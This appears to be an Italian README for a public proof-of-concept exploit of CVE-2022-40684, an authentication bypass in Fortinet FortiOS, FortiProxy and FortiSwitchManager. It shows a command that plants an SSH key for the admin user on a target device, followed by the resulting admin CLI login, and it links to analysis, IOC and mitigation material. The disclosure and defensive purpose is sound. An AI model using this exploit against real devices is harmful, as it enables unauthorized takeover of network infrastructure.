
Un exploit proof of concept per CVE-2022-40684 che colpisce Fortinet FortiOS, FortiProxy e FortiSwitchManager.
POC per CVE-2022-40684 che colpisce i dispositivi Fortinet FortiOS, FortiProxy e FortiSwitchManager.
Un'analisi tecnica della causa principale della vulnerabilità è disponibile sul nostro blog: https://www.horizon3.ai/fortios-fortiproxy-and-fortiswitchmanager-authentication-bypass-technical-deep-dive-cve-2022-40684
Per analizzare i log Fortinet alla ricerca di indicatori di compromissione e per sapere come abilitare log più approfonditi, consulta il nostro blog sugli IOC: https://www.horizon3.ai/fortinet-iocs-cve-2022-40684/
Questo POC sfrutta la vulnerabilità di bypass dell'autenticazione per impostare una chiave SSH per l'utente specificato.
root@kali:~# python3 CVE-2022-40684.py -t 10.0.40.67 --username admin --key-file ~/.ssh/id_rsa.pub
[+] SSH key for admin added successfully!
root@kali:~# ssh [email protected]
fortios_7_2_1 #
config Configure object.
get Get dynamic and system information.
show Show configuration.
diagnose Diagnose facility.
execute Execute static commands.
alias Execute alias commands.
exit Exit the CLI.
Aggiorna all'ultima versione oppure adotta le mitigazioni seguendo le istruzioni riportate nel PSIRT di Fortinet
Il presente software è stato creato esclusivamente per scopi di ricerca accademica e per lo sviluppo di tecniche difensive efficaci, e non è inteso per essere utilizzato per attaccare sistemi se non esplicitamente autorizzato. I maintainer del progetto non sono responsabili dell'uso improprio del software. Usalo in modo responsabile.